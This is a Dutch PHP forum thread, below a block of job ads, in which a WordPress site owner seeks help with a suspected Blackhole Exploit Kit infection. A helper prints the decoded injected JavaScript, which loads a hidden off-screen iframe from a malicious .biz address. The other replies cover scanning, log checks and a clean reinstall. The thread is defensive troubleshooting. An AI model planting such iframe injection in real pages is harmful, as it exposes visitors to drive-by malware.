Blackhole Exploit Kit

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

PHP developer

Functie omschrijving Voor een klein bedrijf in de buurt van Nieuwegein zijn wij per direct op zoek naar een talentvolle PHP developer. Er wordt veel ruimte geboden voor eigen initiateven, waardoor je een mooie stempel kan drukken op jouw eigen werkzaamheden (zowel operationeel als strategisch). Het bedrijf heeft middels externe programmeurs een multimedia platform ontwikkeld, maar willen geleidelijk de ontwikkeling naar binnen halen. Om die reden zoeken zij een communicatieve interne PHP developer die graag meebouwt aan het succesvolle product. Je gaat de volgende werkzaamheden verrichten: Platform beheren en programmeren (PHP, MySQL, JQuery, Javascript, XML & HTML); Communicatie en aansturing

Bekijk vacature »

Software Programmeur PHP - JAVA

Functie Wil jij bij een platte en informele organisatie werken? Lees dan snel verder! Voor een opdrachtgever in omgeving Boskoop dat zich gespecialiseerd heeft in het realiseren van veilige netwerkverbindingen zijn wij op zoek naar een leuke software developer ter versterking van het huidige team. Hoe kan jouw dag er straks uitzien? Je gaat technische klussen uitvoeren op locatie bij klanten.Je onderhoudt contact met de projectleider om er zeker van te zijn dat een projecten goed verlopen. Je gaat klanten ondersteunen op het gebied van geleverde software en webapplicaties. Je gaat software en webapplicaties ontwikkelen met behulp van de talen

Bekijk vacature »

Low Code Developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en ben jij HBO afgestudeerd in de richting van IT? Heb jij verstand van datamodellering, NO CODE Platformen en kun jij het aan om projecten te leiden? Voor een leuke opdrachtgever in omgeving Capelle aan den IJssel zijn wij op zoek naar een No Code developer die zich bezig gaat houden met het optimaliseren van bedrijfsprocessen bij klanten in heel het land! Wat ga je hier zoal doen? Je gaat geen code kloppen maar bedenken hoe applicaties eruit moet komen te zien. Je gaat werken met een non code platform, je

Bekijk vacature »

Programmeur / Developer

Voor een familiebedrijf in Doetinchem, actief in de machinebouw voor de food-sector, zijn wij op zoek naar een programmeur / developer. In deze functie ben je werkzaam in een team van 5 medewerkers. Je werkzaamheden bestaan onder andere uit het verhelderen van requirements vanuit de opdrachtgever, de klant en de afdeling ontwikkeling. Je verricht haalbaarheidsstudies en werkt specificaties uit die je afstemt met de opdrachtgever. Je ontwerpt design in software en stemt af met je collega's. De huidige vision-systemen zijn geschreven in C software, welke draait op een CUDA platform. Je schrijft en codeert software en zal gaan testdraaien. Tot

Bekijk vacature »

Frontend Developer - Leeuwarden

Als Frontend Developer bouw jij mee aan het onderwijs van de toekomst! In een scrum team werken met jonge en enthousiaste collega’s, moderne technieken, ruimte voor eigen ontwikkeling en op een proactieve wijze kunnen meewerken aan innovatie binnen het onderwijs. Magister is het state-of-the-art softwarepakket dat scholen in het voortgezet onderwijs op alle fronten ontzorgt. Van leerlingenadministratie tot het ondersteunen van individuele leerlijnen, van toegang tot digitaal lesmateriaal tot het plannen van het lesrooster. In de Magister app bedient Magister ruim 2,5 miljoen gebruikers waarvan, dagelijks meer dan 600.000 unieke. Hiermee is Magister de absolute marktleider in onderwijsland. Wat vragen

Bekijk vacature »

Back-end Developer C#

Functie omschrijving We are looking for a dutch native speaker Ben jij een ervaren back-end developer, die graag in een in-house functie wil werken? Passen de woorden innovatie, programmeren en teamspeler bij jou? Zoek niet verder en lees snel verder. Voor een echt familiebedrijf in de regio van Uden ben ik op zoek naar een back-end developer, die met name kennis heeft van C# en .NET. Jij gaat de interne applicaties verder optimaliseren en nieuwe features ontwikkelen. Verder ga je de volgende werkzaamheden uitvoeren: Ondersteunen gebruikers; Uitvoeren van analyses van de software/applicaties; Maken van functionele ontwerpen en deze door vertalen

Bekijk vacature »

C#.NET Developer

Dit ga je doen Ontwikkelen van de Back-end in .NET6 / C# en WebAPI (Focus);) Ontwikkelen van de Front-End in Nodje.js en Angular (secundair); Opstellen van een technisch ontwerp; Testen, documenteren en implementeren van de nieuwe applicatie; Verzorgen van de nazorg, na de implementatie; Het oplossen van bugs en incidenten. Hier ga je werken Als C#.NET Developer binnen deze organisatie kan jij het verschil maken. Zij werken momenteel nog met programmatuur die is ontwikkeld in C++. Hiervan gaan zij afscheid nemen zodra alle nieuwe software in C#.NET geschreven is. Een grootschalig en langdurig project. Voor hen is deze software van

Bekijk vacature »

Fasttrack learning & development voor Java dev

Wat je gaat doen: Wij zoeken enthousiaste en ambitieuze junior en medior ontwikkelaars die toe zijn aan de volgende stap in hun carrière. Wij helpen je op je pad naar senior ontwikkelaar door ons fasttrack learning en development programma. Na een kort en intensief programma ga jij aan de slag bij klanten van DPA. Daarnaast krijg je veel ruimte om je te ontwikkelen als persoon en als specialist. De eerste maand gaan we aan de slag om je certificeringen te behalen waaronder OCP (Oracle Certified Professional). Daarnaast nemen we een deepdive in Spring Boot. Ook laten we je kennismaken met

Bekijk vacature »

Lead developer

Functie Als Lead developer wordt jij onderdeel van een multidisciplinair team van circa 23 software engineers. Als team werken jullie agile en zijn termen als Continuous Integration en Continuous Delivery dagelijkse koek. Jullie werken aan uitdagende en afwisselende projecten met als doel klanten een totaal oplossing aan te kunnen bieden. Jij wordt verantwoordelijk voor complete projecten waarbij jij als verantwoordelijke zorgt dat het project op de juiste manier blijft draaien. Zo haal jij ook de requirements op bij de klant en kijk jij samen met het team en met de salesafdeling hoeveel uren hiervoor nodig zijn. Daarnaast stuur jij jouw

Bekijk vacature »

.NET Developer

Functie omschrijving In deze functie ga je werken als C# Developer. Jij gaat aan de slag met de volgende taken: Maatwerk software bouwen; Huidige softwareprojecten verder uitbouwen en optimaliseren; Ideeën van de klant omzetten naar handige oplossingen en tools; Bovenstaande doe je middels de Microsoft- stack: C#, ASP.NET en MVC/ Entity Framework. Ben je net afgestudeerd aan een HBO opleiding Informatica, aarzel dan niet om te solliciteren. Dit is namelijk de ideale startersfunctie! Bedrijfsprofiel Deze organisatie is gevestigd in de regio van Boxtel. Het is van oorsprong een familiebedrijf, die gestart zijn met het bouwen van websites. Dit is door

Bekijk vacature »

Java Developer

Dit ga je doen Ontwerpen en bouwen van nieuwe functionaliteiten binnen de complexe omgeving; Proactief de processen kwalitatief en efficient inrichten; Opzetten van Unit Tests; Code Reviews; Regie nemen voor innovatieve projecten; Landschap beheren en de bijbehorende ketens hierbij in het oog houden. Hier ga je werken De organisatie is actief binnen de financiele branche en heeft een IT afdeling van circa 450 man. De organisatie voorziet de maatschappij binnen de financiele dienstverlening en is gedurende de jaren een onmisbare schakel geworden. Het is een high profile organisatie waar ze veel te maken hebben met veranderingen voortkomend uit maatschappelijke ontwikkelingen,

Bekijk vacature »

.NET developer

Functie Als junior .NET ontwikkelaar ga jij aan de slag in één van de 5 IT teams van dit bedrijf. Jullie werken op basis van interne klantprojecten aan voornamelijk webapplicaties. Dit betekent dat jij continu uitgedaagd wordt en veelal met verschillende soorten projecten bezig bent. Het gave is dan ook dat jullie als team samen bekijken welke technieken het beste passen bij het project waar jullie verantwoordelijk voor zijn. Zo kan het zijn dat jij als .NET developer gaat werken aan een project, maar dat jullie als team liever gebruik maken van Haskell of F# om de klus te klaren.

Bekijk vacature »

WordPress & Azure Developer

Dit ga je doen Zowel front- als back-end development aan de online website omgeving; Het up-to-date houden van alle WordPress-sites; Koppelingen maken tussen applicaties; Meedenken en adviseren over verbeteringen; Development door middel van WordPress, Javascript, HTML en CSS; Werken binnen Scrum/Agile team. Hier ga je werken Voor een grote overheidsinstelling in Den Haag zijn wij opzoek naar een WordPress developer, met kennis en ervaring op het gebied van Azure. De organisatie zit in een grote transitie waarbij de gehele website/online omgeving vernieuwd zal gaan worden. Binnen dit Scrum/Agile team ben je verantwoordelijk voor deze grote migratie/ombouw van de omgeving. De

Bekijk vacature »

SAP ABAP Developer

Dit ga je doen Software ontwikkeling met behulp van o.a. ABAP, Sapscript en Smartforms Maatwerk development op SAP ECC 6.0, in de toekomst S/4 HANA Samenwerken met Business Analisten die functioneel en technisch ontwerpen aanleveren Testen van opgeleverde software Bugfixing Ondersteuning van eindgebruikers Hier ga je werken Onze klant, een internationaal gevestigd productiebedrijf dat mensen blij maakt, is ter versterking op zoek naar een ABAP Developer voor hun SAP team. Het team van 4 mensen verzorgt de ontwikkeling van maatwerk voor de SAP omgeving waar wordt gewerkt met modules SD, FI/CO, PM en MM. Momenteel draait het bedrijf op SAP

Bekijk vacature »

JAVA Programmeur

Bedrijfsomschrijving Functieomschrijving We zoeken per direct enthousiaste software engineers die ons team komen versterken.We werken in DevOps teams met een sterk gevoel voor verantwoordelijkheid. Er wordt nauw samengewerkt met ons Business analyse team (BAT), met onze uitvoerende medewerkers en met de DevOps teams onderling binnen het domein. Het liefst hebben we veel en vaak interactie met onze interne en externe eindgebruikers om zo de juiste dingen te maken. We werken multidisciplinair in een dynamische omgeving. Achtergrond opdracht De Businesseenheid Examens is verantwoordelijk voor de logistiek van de staatsexamens Voortgezet (speciaal) onderwijs, Nederlands als 2e taal en schoolexamens. In het kader

Bekijk vacature »
Brainworx CC

Brainworx CC

14/03/2013 11:56:02
Quote Anchor link
Beste,

Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.

Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald

Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.

Sucuri: OK?

web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No

AVG: NOK?

*url verwijderd ivm veiligheid*

Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn
 
PHP hulp

PHP hulp

06/05/2024 13:05:27
 
TJVB tvb

TJVB tvb

14/03/2013 12:00:53
Quote Anchor link
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?
 
Marvin H

Marvin H

14/03/2013 12:02:39
Quote Anchor link
Het zou ook kunnen zijn dat de hosting provider zelf is gehacked, zit je op shared hosting?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...

Toevoeging op 14/03/2013 12:07:58:

Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM

code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit
 
Brainworx CC

Brainworx CC

14/03/2013 12:10:44
Quote Anchor link
@TJVB, done en geen gevonden object.

@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!
 
Marvin H

Marvin H

14/03/2013 12:14:12
Quote Anchor link
Bovenstaande 'hash' is de volgende HTML code... Duidelijk een injectie in je PHP dus...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
        if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit
 
Brainworx CC

Brainworx CC

24/05/2013 11:59:31
Quote Anchor link
Mensen,

Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.

http://imgur.com/ucekepZ

Iemand die de broncode in WP kan na kijken voor me?
 
Bas IJzelendoorn

Bas IJzelendoorn

24/05/2013 15:25:56
Quote Anchor link
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]
 
Brainworx CC

Brainworx CC

24/05/2013 15:41:48
Quote Anchor link
Maar Bas ... is er ook iemand die mij kan helpen?
 
TJVB tvb

TJVB tvb

24/05/2013 15:50:17
Quote Anchor link
Heb je alles (ook verborgen bestanden) weggehaald en Word Press geheel opnieuw geïnstalleerd?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?

Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.
 
Eddy E

Eddy E

24/05/2013 21:06:40
Quote Anchor link
Inderdaad, buiten WP om even een backup van je database maken (via PHPmyAdmin oid).
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.

Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.